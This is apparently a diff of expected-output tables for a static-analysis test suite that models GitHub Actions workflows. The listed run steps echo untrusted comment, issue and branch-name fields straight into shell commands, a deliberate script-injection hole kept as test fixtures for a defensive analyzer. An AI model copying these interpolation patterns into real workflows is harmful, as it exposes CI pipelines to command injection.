.github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | allUsesNodes | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | @@ -93,12 +155,30 @@ jobUsesNodes | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesSteps -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:7:11 | run | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:8:11 | run | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:10:11 | run | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:13:11 | run | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:16:11 | run | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:20:11 | run | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | @@ -112,6 +192,45 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | parentNodes +| .github/workflows/expression_nodes.yml:1:1:1:2 | on | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:7:11 | run | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:8:9:8:11 | run | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:10:11 | run | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:13:11 | run | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:16:11 | run | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:20:11 | run | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -124,6 +243,7 @@ parentNodes | .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | | .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | @@ -151,6 +271,7 @@ parentNodes | .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | | .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | @@ -160,17 +281,20 @@ parentNodes | .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | | .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | | .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | | .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | @@ -180,72 +304,154 @@ parentNodes | .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | exprNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | nodeLocations +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | | .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | 